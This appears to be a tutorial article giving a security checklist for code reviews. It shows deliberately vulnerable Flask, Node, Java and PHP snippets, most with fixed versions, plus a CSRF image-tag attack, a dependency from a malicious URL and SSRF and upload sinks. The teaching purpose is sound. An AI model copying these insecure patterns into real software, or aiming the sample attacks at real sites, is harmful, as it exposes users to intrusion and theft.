Shipping features without a proper security review is like building a house and skipping the locks. Everything might look fine from the outside until the wrong request hits the wrong endpoint, or a forgotten token shows up in a public repo. By the time the alert fires, the damage is already done.

Code reviews act as the final gate before code goes live. They catch broken logic, misaligned structure, and bugs that tests might miss. But when the queue is long and the team’s moving fast, security details often get brushed aside. A solid security checklist fixes that. This article breaks down the most common security pitfalls that slip through reviews and shows how a structured checklist can bring them to the surface. From input validation to session handling, each section covers what to check, why it matters, and what it looks like in real code. Let’s dive in!

Data Validation and Encoding

Untrusted input is a common target for attackers, but careful input validation and proper output handling can prevent many security issues, including injection attacks.

What to check:

  • Is user input being validated properly?
  • Is output encoded to prevent XSS?
  • Are SQL queries protected from injection?

Example:

// ❌ Vulnerable example: no validation, no encoding, no SQL protection
app.get("/search", (req, res) => {
  const term = req.query.q;                        // 1. raw user input
  const sql = `SELECT * FROM products WHERE name LIKE '%${term}%'`; // 2. string-built SQL
  db.query(sql, (err, rows) => {                   // potential SQL injection
    if (err) throw err;
    // 3. outputs raw data straight into HTML (XSS risk)
    const list = rows.map(r => `<li>${r.name}</li>`).join("");
    res.send(`<ul>${list}</ul>`);
  });
});
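
For contrast, here’s a sketch of the same search idea with all three checks in place. It’s shown in Python/Flask (the stack used in several later examples) with sqlite3 and MarkupSafe; the database file, table, and column names are placeholders:

# ✅ Safer version: validated input, parameterized SQL, encoded output
import re
import sqlite3
from flask import Flask, request, abort
from markupsafe import escape

app = Flask(__name__)

@app.route("/search")
def search():
    term = request.args.get("q", "")
    # 1. Validate: only allow a short, sane search term
    if not re.fullmatch(r"[\w\s-]{1,50}", term):
        abort(400, "Invalid search term")

    # 2. Parameterized query: the driver handles quoting, no string-built SQL
    db = sqlite3.connect("products.db")
    rows = db.execute(
        "SELECT name FROM products WHERE name LIKE ?", (f"%{term}%",)
    ).fetchall()

    # 3. Encode output before it lands in HTML
    items = "".join(f"<li>{escape(name)}</li>" for (name,) in rows)
    return f"<ul>{items}</ul>"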

Access and Session Management

Authentication is just the starting point; what matters next is controlling user access and securing sessions against hijacking.

What to check:

  • Is authentication solid (e.g., token-based, OAuth)?
  • Are there proper checks for who can access what?
  • Is session data stored and managed securely?

Example:

from flask import Flask, request, session

app = Flask(__name__)
app.secret_key = "12345"          # ❌ hard-coded, weak secret
app.config["SESSION_COOKIE_SECURE"] = False   # ❌ cookie sent over HTTP
app.config["SESSION_COOKIE_HTTPONLY"] = False # ❌ client-side scripts can read cookie

# "Login" just trusts whatever username is passed in the URL
@app.route("/login")
def login():
    session["user"] = request.args.get("user"# ❌ no password or token check
    return f"Logged in as {session['user']}"

# Admin route with zero authorization checks
@app.route("/admin")
def admin():
    return "Sensitive admin data: top-secret numbers"

if __name__ == "__main__":
    app.run(debug=True)
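
A version that would pass those checks might look like the sketch below. The environment variable name, the in-memory user store, and the role names are illustrative (a real app would load users and hashes from a database); the password helpers come from werkzeug.security, which ships with Flask:

import os
from functools import wraps
from flask import Flask, request, session, abort
from werkzeug.security import generate_password_hash, check_password_hash

app = Flask(__name__)
app.secret_key = os.environ["SECRET_KEY"]             # ✅ secret supplied by the environment
app.config["SESSION_COOKIE_SECURE"] = True            # ✅ cookie only travels over HTTPS
app.config["SESSION_COOKIE_HTTPONLY"] = True          # ✅ not readable by client-side scripts

# Illustrative in-memory user store; a real app would load users from a database
USERS = {"alice": {"password_hash": generate_password_hash("demo-only-password"), "role": "admin"}}

@app.route("/login", methods=["POST"])
def login():
    user = USERS.get(request.form.get("user", ""))
    if not user or not check_password_hash(user["password_hash"], request.form.get("password", "")):
        abort(401)                                     # ✅ credentials are actually verified
    session["user"] = request.form["user"]
    return "Logged in"

def require_role(role):
    def decorator(view):
        @wraps(view)
        def wrapped(*args, **kwargs):
            current = USERS.get(session.get("user", ""))
            if not current or current["role"] != role:
                abort(403)                             # ✅ authorization checked on every request
            return view(*args, **kwargs)
        return wrapped
    return decorator

@app.route("/admin")
@require_role("admin")
def admin():
    return "Sensitive admin data"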

Secrets and Cryptography

Attackers can easily exploit hardcoded secrets and weak encryption, but strong secret management and proper encryption practices help keep sensitive data safe.

What to check:

  • Are secrets (like API keys) kept out of code?
  • Are secure storage methods used (e.g., vaults, env vars)?
  • Are strong encryption algorithms in place?

Example:

// ❌ 1. API key and DB password hard-coded in source
const STRIPE_API_KEY   = "sk_live_9gC2abCD3XYZ";
const DB_ADMIN_PASS    = "P@ssword123";

// ❌ 2. "Encrypts" data with a key that's also hard-coded
const PLAINTEXT_KEY    = "my-secret-key";                  // stored in code
function encrypt(data) {
  // Weak XOR "encryption" for demo; trivial to break
  return Buffer.from(data.split("")
    .map((c, i) => c.charCodeAt(0) ^ PLAINTEXT_KEY.charCodeAt(i % PLAINTEXT_KEY.length))
  );
}

// ❌ 3. Stores passwords with broken MD5 hash
const crypto  = require("crypto");
function storeUserPassword(rawPass) {
  const md5Hash = crypto.createHash("md5").update(rawPass).digest("hex"); // weak hash
  db.users.insert({ password: md5Hash });
}

// Sample usage
console.log("Encrypted:", encrypt("Sensitive payment token"));
storeUserPassword("hunter2");

Error Handling and Observability

While clear logs are useful during incidents, exposing detailed error messages to users can reveal sensitive information. Striking the right balance between visibility and discretion is key.

What to check:

  • Are error messages generic and leak-free?
  • Is logging structured and free of sensitive info?
  • Are logs useful for detecting issues later?

Example:

from flask import Flask, request
import traceback, logging

app = Flask(__name__)

# ❌ Unstructured logger that prints entire request data (incl. card number!)
logging.basicConfig(level=logging.INFO)

@app.route("/pay", methods=["POST"])
def pay():
    try:
        # Extract raw card data from user
        card_number = request.form["card"]
        amount      = float(request.form["amount"])

        logging.info(f"Processing payment {card_number} for ${amount}"# ❌ sensitive info in logs

        # Simulated crash
        raise ValueError("Third-party payment API failed")

    except Exception as e:
        # ❌ Sends full stack trace back to user (information leak)
        return f"<pre>{traceback.format_exc()}</pre>", 500

if __name__ == "__main__":
    app.run(debug=False)
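
A safer version keeps the traceback in the logs and hands the user a generic message. The masking helper and log format below are illustrative choices, not requirements:

from flask import Flask, request, jsonify
import logging

app = Flask(__name__)
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(name)s %(message)s",  # ✅ consistent, parseable log lines
)
logger = logging.getLogger("payments")

def mask_card(card_number):
    return f"****{card_number[-4:]}"                   # ✅ only the last four digits are logged

@app.route("/pay", methods=["POST"])
def pay():
    try:
        card_number = request.form["card"]
        amount = float(request.form["amount"])
        logger.info("Processing payment card=%s amount=%.2f", mask_card(card_number), amount)
        raise ValueError("Third-party payment API failed")   # simulated crash, as in the original
    except Exception:
        logger.exception("Payment failed")             # ✅ full traceback stays server-side
        return jsonify({"error": "Payment could not be processed"}), 500  # ✅ generic message to the user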

Dependency Security

Old or vulnerable packages can quietly introduce serious risks into your codebase. Just because something works doesn’t mean it’s safe to use. Keeping dependencies in check is a key part of writing secure software.

What to check:

  • Are all dependencies regularly updated?
  • Are unused or unnecessary packages removed?
  • Do any packages come from unverified or unknown sources?

Example:

{
  "name": "demo-app",
  "version": "1.0.0",
  "scripts": {
    // ❌ No security checks or update process in place
    "start": "node index.js"
  },
  "dependencies": {
    // ❌ Outdated version with known vulnerabilities
    "express": "4.16.0",
    // ❌ Package added from an unknown or untrusted source
    "suspicious-lib": "https://malicious-site.com/lib.js"
  }
}
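
A cleaned-up manifest might look like the sketch below; the exact version and the audit script are examples, and the right pinning and update policy depends on your team:

{
  "name": "demo-app",
  "version": "1.0.0",
  "scripts": {
    "start": "node index.js",
    // ✅ Vulnerability scanning wired into the workflow
    "audit": "npm audit --audit-level=high"
  },
  "dependencies": {
    // ✅ Current, maintained release from the official registry; the untrusted extra is gone
    "express": "^4.19.2"
  }
}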

Configuration and Communication Security

Misconfigured settings often open the door to attacks, even when the code itself is secure. Many exploits start with something as simple as a missing header or an exposed debug mode.

What to check:

  • Are TLS, CORS, and security headers set correctly?
  • Is debug mode disabled in production?
  • Are APIs protected against abuse (e.g., rate limits)?

Example:

from flask import Flask, jsonify
from flask_cors import CORS

app = Flask(__name__)
app.config["DEBUG"] = True                 # ❌ debug mode left on in production

# ❌ CORS allowed from anywhere
CORS(app, resources={r"*": {"origins": "*"}})

@app.after_request
def no_security_headers(resp):
    # ❌ missing HSTS, CSP, X-Frame-Options, etc.
    return resp

@app.route("/api/info")
def info():
    return jsonify({"status": "public endpoint"})  # ❌ no auth, no rate limit

if __name__ == "__main__":
    # ❌ listens on port 80 (HTTP), no TLS cert
    app.run(host="0.0.0.0", port=80)

Common Security Vulnerabilities to Look For

Catch these common security vulnerabilities before they slip into production:

CSRF and SameSite Cookies

Cross-Site Request Forgery (CSRF) tricks a signed-in user’s browser into sending a state-changing request to your site; the browser willingly attaches the user’s session cookie. The SameSite cookie attribute reduces this risk by telling the browser not to send cookies on cross-site requests, adding a “seatbelt” layer.

What to check:

  • Does every state-changing request (POST/PUT/DELETE) carry a unique, server-generated CSRF token?
  • Are all session cookies set with SameSite=Lax (or Strict), Secure, and HttpOnly?
  • Do any endpoints mistakenly allow GET requests to change data?

Here’s an example of a silent money transfer triggered by a malicious image tag:

# Session cookie sent without SameSite
Set-Cookie: sessionId=abc123; Secure; HttpOnly

<!-- Attacker's site -->
<img src="https://bank.example.com/transfer?to=attacker&amount=1000">

Server-Side Request Forgery (SSRF)

SSRF happens when an app fetches a user-supplied URL, and an attacker tricks it into accessing internal systems or cloud secrets.

What to check:

  • Does the code validate destination hosts against a fixed allowlist before making outbound requests?
  • Are private IP ranges (169.254.169.254, 10.0.0.0/8, etc.) explicitly blocked?
  • Are responses from fetched URLs ever reflected back to the client without being sanitized?

Here's an example where supplying a cloud metadata URL causes the server to fetch AWS credentials:

# Flask route that screenshots a user-supplied URL
import requests
@app.route("/screenshot")
def grab():
    url = request.args.get("url")          # untrusted
    img = requests.get(url).content        # SSRF sink
    return send_file(io.BytesIO(img), mimetype="image/png")
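
Here’s a hedged sketch of the same route with an allowlist and private-address blocking; the allowed host and helper name are illustrative:

import io, ipaddress, socket
from urllib.parse import urlparse
import requests
from flask import request, send_file, abort

ALLOWED_HOSTS = {"images.example.com"}                 # fixed allowlist of outbound destinations (illustrative)

def resolves_to_private_address(host):
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True                                    # unresolvable: treat as unsafe
    addrs = [ipaddress.ip_address(info[4][0]) for info in infos]
    return any(a.is_private or a.is_link_local or a.is_loopback for a in addrs)

@app.route("/screenshot")
def grab():
    url = request.args.get("url", "")
    host = urlparse(url).hostname or ""
    # ✅ https only, known hosts only, never private/metadata addresses
    if not url.startswith("https://") or host not in ALLOWED_HOSTS or resolves_to_private_address(host):
        abort(400, "URL not allowed")
    img = requests.get(url, timeout=5).content
    return send_file(io.BytesIO(img), mimetype="image/png")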

Insecure Deserialization

Insecure deserialization happens when an application deserializes untrusted data; an attacker can craft a serialized payload that chains existing “gadget” classes to execute code or manipulate data structures.

What to check:

  • Does the app ever call readObject(), pickle.loads(), or similar on data that came from a client?
  • Are you using an allowlist/“sealed” class approach or a safe data-only format (JSON, protobuf) instead?
  • Are deserialized objects ever passed straight into privileged methods?

Here's an example where a crafted serialized payload can trigger shell command execution during deserialization:

// Reads a serialized object straight from the request body
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Employee emp = (Employee) ois.readObject();   // attacker controls byte stream
database.save(emp);
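
The safer pattern from the checklist, accepting a data-only format and validating it before use, is sketched here in Python for consistency with the other examples; the Employee fields and route are illustrative, and database.save mirrors the Java snippet above:

import json
from dataclasses import dataclass
from flask import request, abort

@dataclass
class Employee:
    name: str
    department: str

@app.route("/employees", methods=["POST"])
def save_employee():
    try:
        payload = json.loads(request.data)             # ✅ data-only format, no object graphs to hijack
    except json.JSONDecodeError:
        abort(400, "Invalid JSON")
    if not isinstance(payload, dict) or not isinstance(payload.get("name"), str) \
            or not isinstance(payload.get("department"), str):
        abort(400, "Unexpected payload")               # ✅ explicit validation before the data is used
    database.save(Employee(name=payload["name"], department=payload["department"]))  # database.save as above
    return "saved", 201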

Business-Logic Flaws

A business-logic flaw misuses the “happy-path” rules of the application (price calculations, workflow steps, quotas) rather than exploiting low-level bugs, letting attackers bend the rules to their advantage.

What to check:

  • Can users skip or repeat critical workflow steps (e.g., checkout without payment)?
  • Are discounts, balances, or quotas calculated only on the client side?
  • Do APIs apply the same input validation as the user interface, or can someone send different parameters directly to the backend?

Here’s an example where an attacker changes the price in the request and pays $1 for a $100 item:

# Client posts a price; server trusts it
@app.route("/pay", methods=["POST"])
def pay():
    amount = float(request.form["price"])      # attacker controls price
    charge_customer(current_user, amount)      # $1 instead of $100
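
A sketch of the server-side fix: the client only names the item, and the server owns the price. The price table is illustrative; charge_customer and current_user are the same names used in the snippet above:

from flask import request, abort

# ✅ Server-side price table (illustrative); the client never sends an amount
PRICES = {"basic-plan": 100.00, "addon": 10.00}

@app.route("/pay", methods=["POST"])
def pay():
    item = request.form.get("item", "")
    if item not in PRICES:
        abort(400, "Unknown item")
    charge_customer(current_user, PRICES[item])        # ✅ amount can no longer be tampered with
    return "OK"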

File-Upload Risks

In this case, the server accepts uploaded files without proper checks, allowing attackers to upload dangerous files like scripts or oversized archives that can lead to remote code execution or denial-of-service.

What to check:

  • Does the backend strictly allow only safe file types, like .png or .jpg?
  • Are MIME types and file signatures (magic bytes) verified rather than trusting the Content-Type header?
  • Are uploaded files stored outside the web-root or served through a separate content server?

Here’s an example where uploading a .php file lets an attacker execute code directly on the server:

// Saves upload with its original name inside web-root
move_uploaded_file($_FILES['file']['tmp_name'],
                  'uploads/' . $_FILES['file']['name']);
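
Here’s a hedged sketch of those checks in Python/Flask, matching the other examples in this checklist; the upload directory, allowed types, and magic-byte table are illustrative:

import os, secrets
from flask import request, abort
from werkzeug.utils import secure_filename

UPLOAD_DIR = "/var/app-data/uploads"                   # ✅ outside the web root (path is illustrative)
ALLOWED_EXTENSIONS = {".png", ".jpg"}
MAGIC_BYTES = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")  # PNG and JPEG signatures

@app.route("/upload", methods=["POST"])
def upload():
    file = request.files["file"]
    ext = os.path.splitext(secure_filename(file.filename))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        abort(400, "File type not allowed")            # ✅ strict extension allowlist
    header = file.stream.read(8)
    file.stream.seek(0)
    if not any(header.startswith(sig) for sig in MAGIC_BYTES):
        abort(400, "Contents don't match an allowed image type")  # ✅ magic bytes, not the Content-Type header
    stored_name = f"{secrets.token_hex(16)}{ext}"      # ✅ server-chosen name, never the original one
    file.save(os.path.join(UPLOAD_DIR, stored_name))
    return "uploaded", 201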

Conclusion

Security is a vital pillar of effective code reviews. Integrating this checklist into your review process, automating what you can, and revisiting it regularly helps your team catch vulnerabilities early and ship code that’s secure and reliable. With security woven into every sprint, each review becomes a meaningful step toward building reliable software that stands strong in the real world.